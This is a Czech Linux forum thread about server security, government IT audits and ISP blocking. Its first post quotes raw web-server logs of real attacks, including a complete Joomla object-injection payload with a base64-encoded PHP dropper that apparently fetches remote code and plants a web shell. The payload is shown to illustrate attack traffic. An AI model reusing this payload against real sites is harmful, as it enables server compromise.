Portál AbcLinuxu, 23. dubna 2024 15:33
Tiskni
Sdílej:
16.6.2016 11:55
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
Malware je doménou prohlížečů.Ani nepočítám, kolikrát jsem někoho viděl řešit vypwnovaný server, protože se tam malware vlámal přes nějakou PHP mrdku, kterou programovala nějaká poloretardovaná opice (naposledy můj bratr cca půl roku zpět musel odepsat celý server a udělat kvůli tomu reinstall). Minimálně dvakrát jsem psal software, který tyhle chyby uměl hledat. Schválně se někdy podívej do logů, kolik tam je těhle útoků. Například ke mě na server je jich o dost víc, než regulérních přístupů. Doslova můžu říct, že klepou co pár minut. Typický scan, viz třeba:
181.143.27.106 - - [15/Jun/2016:01:33:41 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 40 "-" "-" 181.143.27.106 - - [15/Jun/2016:01:34:59 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 33 "-" "-" 181.143.27.106 - - [15/Jun/2016:01:36:17 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 37 "-" "-"To ani nepočítám hovna jako:
192.187.109.42 - - [14/Jun/2016:07:03:44 +0200] "GET / HTTP/1.1" 200 35641 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDataba
seDriverMysql":0:{}s:8:"feed_url";s:3738:"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ
1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBi
U3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9
WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQm
xiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwV
lNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxD
QW5keWNwT3cwS1puZHlhWFJsS0NSdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1pa3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeklpT3cwS1pXTm9ieUFpWkc5dVp
USWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamFHVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdm
NETXBPdzBLRFFva1kyaGxZMnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d
1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4
dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkN
kZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSk
hSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxY
m1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1
SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zS
UNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}<F0><FD><FD><FD>"
192.187.109.42 - - [14/Jun/2016:07:03:45 +0200] "GET / HTTP/1.1" 200 35641 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:3738:"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1pa3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeklpT3cwS1pXTm9ieUFpWkc5dVpUSWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamFHVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdmNETXBPdzBLRFFva1kyaGxZMnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxYm1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zSUNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}<F0><FD><FD><FD>"
192.187.109.42 - - [14/Jun/2016:07:03:45 +0200] "GET /media/xxxx.php HTTP/1.1" 404 26 "-" "python-requests/2.9.1"
192.187.109.42 - - [14/Jun/2016:07:03:45 +0200] "GET /media/css.php HTTP/1.1" 404 25 "-" "python-requests/2.9.1"
Ono obecně, někdy doporučuji si nahodit na virtuál honeypot a pak si číst logy. Člověk by asi nevěřil, kolik útoků běžně chodí na ničím nevýznamný server.
16.6.2016 11:57
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
16.6.2016 12:43
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
16.6.2016 13:03
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
16.6.2016 13:08
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
16.6.2016 12:44
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
Servery jsou bez grafického rozhraní, přístup pouze přes ssh do textové konzole.Riziko zranitelnosti existuje vzdy.
Malware je doménou prohlížečů.To je naprosty nesmysl.
S tím backdoorem to možná pravda je, ale pokud je přístup pouze přes chráněnou proxy s antivir a antimalware štítem tak by mělo být riziko minimální, pokud se nepletu.Pred ctenim prikazu nekde ze vzdaleneho HTTP serveru a naslednym vyleakovanim cennych dat te asi antivir ani antimalware stit moc neuchrani. Jinak sis ale odpovedel sam - i kdyby to riziko bylo minimalni, porad existuje.
Znám několik celoplošných systémů českých bezpečnostních ministerstev (jeden systém asi 3 tisíce denně aktivních uživatelů), které jedou na linux systémech (například SLES) a k internetu 100 procentně nesmí být konektováni. Čistá LAN.
Žádný problém s provozem systémů nemají. Na jednom utajovaném jsem pracoval s HP-UX (unix) s šifrovaný dedikovanými linkami do zahraničí.
16.6.2016 11:24
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
Dle mého skromného úsudku je přínos takového opatření k bezpečnosti diskutabilní, a naopak přináší spoustu práce a úskalí administrátorům těchto strojů.Je to přesně tak. Pracoval jsem na mnoha projektech, které byly "zabezpečeny" dle nějakého auditu (což je asi tak to nejhorší, co může nastat), to znamená za devatero VPN, oddělené sítě, přístupové karty apod. Pracovat se na tom nedalo. Pochopitelně, aby se na tom pracovat dalo (protože třeba ministr si na tiskovce vzpomněl, že slíbil nějaký systém), tak si ti admini vytvořili tunel přímo do těch systémů. No a dodavatelé tento tunel potom dostali taky. Takže oficiálně se dělala šaškárna s VPN kartami apod, ale reálně se jelo v podstatě přímo. Jinak by totiž ta zakázka nešla realizovat vůbec. Problém je, že jak jde čas, tak se vymění admini a na tento tunel se zapomeneme. Případně se o něj nikdo nestará, takže to zůstane v konfiguraci z roku 2007 - RSA 1024, MD5 apod. Takže další bezpečnostní hrozba. (Mimochodem, tohle je sranda. Řeší se heartbleedy apod., nahrazují se klíče, vyhazují se staré šifry - což je dobře - ale jen z webserverů, na všechno ostatní se zapomíná - třeba na ty VPNky). Další věc, úřady celkem pravidelně dostávají emaily od CSIRTu a NCKB (apod. strašně užitečných institucí) a protože na tom úřadě tomu vůbec nikdo ani náznakem nerozumí, ale mají pocit, že to "nařízení" shora musí splnit, tak to potom pošlou na dodavatele IT řešení. Výsledkem je třeba to, že se před stávající servery dá firewall (pochopitelně cisco za půl mega) a servery se nedostanou třeba ani na repositáře pro aktualizace (protože v nějakém audity nějaký ňouma napsal, že se musí blokovat směr ven). Protože to dodavatel těch serverů (který se samozřejmě jiný, než dodavatel sítě a ten je jiný jak dodavatel VPN a tak dále), to nechce řešit (protože je to tak na půl roku a stejně mu končí smlouva), tak ty servery zůstanou rovnou bez updatů. Takže ve zkratce: většina bezpečnostních opatření, které jsem ve státní správě viděl, zcela neomylně vedla k narušení bezpečnosti.
16.6.2016 16:53
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
16.6.2016 23:38
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
Kolik těchto strojů, které byly "zabezpečeny" dle nějakého auditu (dle tvých slov), bylo napadeno?Nevím a je to jedno.
Pokud kritizuješ nefunkční zabezpečení, je zřejmě jednoduché ty stroje napadnout.Já kritizuji stav, kdy se udělá nějaké oficiální zabezpečení a vedle toho (aby se na tom dalo vůbec pracovat a aby to vůbec běželo), se udělá díra. To, že tu díru třeba nikdo zatím nezneužil (nebo ji zneužil tak, že to nikdo nepoznal), na věci nic nemění. Je také dost dobře možné, že ta díra je zabezpečena dostatečně (alespoň po určitý čas) a tedy to oficiální, superdrahé zabezpeční je prostým plýtváním (zkrátka se to mohlo udělat rovnou technologií té díry). Ať tak či onak, nepovažuji za vhodné z hlediska bezpečnosti, pokud se systém navrhne nějakým způsobem (který odporuje provozu), a potom se pokoutně provozuje zcela jinak. Představ si, že by se tímto způsobem stavěly dálnice. Že by třeba někdo ignoroval okolní prostředí ... ehm špatný příklad ... nebo třeba stavěly mosty ... kua, zase
Snad je jasné, kam tím mířím.
16.6.2016 23:52
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
nějaké oficiální zabezpečeníA jak jsem psal. Ono je to často dělané stylem, že NCKB pošle email, na úřadě mu vůbec nikdo nerozumí, tak to pošle na dodavatele*, ten se k tomu třeba vyjádří stylem, že je to zcela nerelevantní, úřad pošle befel, že to musí být, tak to dodavatel udělá (no, nějak). Výsledkem je chaos vzájemně nespolupracujících opatření. Takto se bezpečnost dosáhnout nedá. *) Pokud se ovšem vůbec trefí do toho správného. Úřady mají mnoho IT dodavatelů (sít, fw, vpn, virtualizace, hw, dodavatel webů, dodatavel intranetu apod.) a některé ani vůbec neví, která firma jim co dělá (zrovna dneska mi přišel takový hezký bug appky cizí firmy. Dřív jsem jim alespoň psal, která firma jim to dodala, ale přestal jsem s tím po zjištění, že si to ani neobtěžují zapamatovat.). Do takového prostředí pak přijde kontrola z ministerstva a vypadá to stejně jako v Monty Python's skeči (akorát v reálu, je to ještě větší sranda).
Je to přesně tak. Pracoval jsem na mnoha projektech, které byly "zabezpečeny" dle nějakého auditu (což je asi tak to nejhorší, co může nastat), to znamená za devatero VPN, oddělené sítě, přístupové karty apod. Pracovat se na tom nedalo.vs.
tak si ti admini vytvořili tunel přímo do těch systémů. No a dodavatelé tento tunel potom dostali taky. Takže oficiálně se dělala šaškárna s VPN kartami apod, ale reálně se jelo v podstatě přímo. Jinak by totiž ta zakázka nešla realizovat vůbec.Takže reálně podmínky toho auditu pravděpodobně nesplnily.
Případně se o něj nikdo nestará, takže to zůstane v konfiguraci z roku 2007 - RSA 1024, MD5 apod. Takže další bezpečnostní hrozba.Takový systém by neprošel ani PCI-DSS v 3.2 auditem.
Výsledkem je třeba to, že se před stávající servery dá firewall (pochopitelně cisco za půl mega) a servery se nedostanou třeba ani na repositáře pro aktualizace (protože v nějakém audity nějaký ňouma napsal, že se musí blokovat směr ven). Protože to dodavatel těch serverů (který se samozřejmě jiný, než dodavatel sítě a ten je jiný jak dodavatel VPN a tak dále), to nechce řešit (protože je to tak na půl roku a stejně mu končí smlouva), tak ty servery zůstanou rovnou bez updatů.On pravděpodobně ten auditor taky řekl, že ty systémy musí být aktualizované, takže je akorát tak chyba té organizace, že dodržela část doporučení a část ne. Mají si nasadit lokální mirror, jako to dělají každé normální security-aware organizace, stahovat aktualizace z public repository je stejně blbost, protože jak chceš třeba zajistit testování jednotlivých aktualizací? Zpravidla se aktualizace nejdřív testují a pak se pustí do produkčního prostředí.
18.6.2016 16:16
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
takže je akorát tak chyba té organizaceAno, říkal jsem, že tomu na těch úřadech vůbec nikdo nerozumí. (Až na výjimky, jsou ministerstva, se kterými se pracuje dobře a na IT jsou skuteční admini.)
Mají si nasadit lokální mirror, jako to dělají každé normální security-aware organizace, stahovat aktualizace z public repository je stejně blbost, protože jak chceš třeba zajistit testování jednotlivých aktualizací?Jo, což by dopadlo přesně tak, že nějaká firma by nasadila lokální mirror (a zakázka je hotova), tento mirror by se stejně nikam nenastavil (protože firma nasazující tento mirror nemá oprávnění ani možnosti zasahovat do serverů), a potom by stejně přišel befel blokujte odchozí provoz a ani servery tohoto mirorru by se nedostaly na repa.
tento mirror by se stejně nikam nenastavil (protože firma nasazující tento mirror nemá oprávnění ani možnosti zasahovat do serverů),Tak když si někdo neumí udělat specifikaci vlastního IT prostředí...
Jako třeba že každý server toho a toho typu musí být nastaven tak a tak - třeba CIS hardening,... tak se nedivím, že vám ty audity neprocházejí :D
20.6.2016 09:50
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
21.6.2016 02:17
Jendа | skóre: 78
| blog: Jenda
| JO70FB
na všechno ostatní se zapomíná - třeba na ty VPNkyTohle mě fascinuje. Debian Jessie měl po vydání v Dovecotu defaultně RC4-40 a MD5 a openvpn snad dosud generuje 1024b RSA klíče (minimálně na Wheezym ještě generovala).
Další věc, úřady celkem pravidelně dostávají emaily od CSIRTu a NCKB (apod. strašně užitečných institucí) a protože na tom úřadě tomu vůbec nikdo ani náznakem nerozumíDopis od NCKB. Taky mi chvíli trvalo, než jsem pochopil, co se mi vlastně snaží sdělit.
Protože to dodavatel těch serverů (který se samozřejmě jiný, než dodavatel sítě a ten je jiný jak dodavatel VPN a tak dále), to nechce řešit (protože je to tak na půl roku a stejně mu končí smlouva), tak ty servery zůstanou rovnou bez updatů.Pak potkávám ještě jeden scénář: dodavatel nainstaluje CentOS/Debian se svojí aplikací, nikomu nic neřekne a odejde. Distribuci skončí podpora a nikdo to nedokáže aktualizovat, aby se to nerozsypalo.
Pak potkávám ještě jeden scénář: dodavatel nainstaluje CentOS/Debian se svojí aplikací, nikomu nic neřekne a odejde. Distribuci skončí podpora a nikdo to nedokáže aktualizovat, aby se to nerozsypalo.A pak přišel Docker...
21.6.2016 13:04
Jendа | skóre: 78
| blog: Jenda
| JO70FB
23.6.2016 17:24
Acci | skóre: 3
| blog: Jen na chvíli…
23.6.2016 19:07
Jendа | skóre: 78
| blog: Jenda
| JO70FB
23.6.2016 23:28
pavlix | skóre: 54
| blog: pavlix
24.6.2016 07:45
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Je to tak. Vyzkoušel jsem si taky jediný požadavek. Až druhý den kolem 10. hodiny zablokovaly TCP porty pro SSH, IMAPS, IPv6 nad IPv4 a kdoví co ještě. Oběma směry. Tak jsem jim tam zavolal, UPC problém identifikovalo jako „malware“ a trvali na tom, abych pročistil systém. Na to jsem chtěl podrobnosti, ať vím, co hledat, to ale nebyli ochotni sdělit. Tak jsem poměrně nesrozumitelně nadhodil on IP adresu a operátor se chytil a řekl, že tam má uveden pokus o spojení na její port 80. Trochu jsem si postěžoval, že by příště by mohli informovat e-mailem o zablokování (nic mi nepřišlo) a na blokovaný provoz by mohli reagovat ICMP zprávami namísto tichého zahazování. Operátor mě ujistil, že se mým zlepšovákem budou zabývat. Je fakt smutné, že jediný SYN packet může odpojit zákazníka.
Operátor mě ujistil, že se mým zlepšovákem budou zabývat.Překlad: jdi do prdele a polož už konečně ten telefon.
24.6.2016 10:18
Acci | skóre: 3
| blog: Jen na chvíli…
24.6.2016 10:22
Jendа | skóre: 78
| blog: Jenda
| JO70FB
24.6.2016 13:58
Acci | skóre: 3
| blog: Jen na chvíli…
24.6.2016 15:37
Jendа | skóre: 78
| blog: Jenda
| JO70FB
24.6.2016 10:23
Jendа | skóre: 78
| blog: Jenda
| JO70FB
21.6.2016 02:07
Jendа | skóre: 78
| blog: Jenda
| JO70FB
ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.
15.6.2016 22:08
15.6.2016 22:26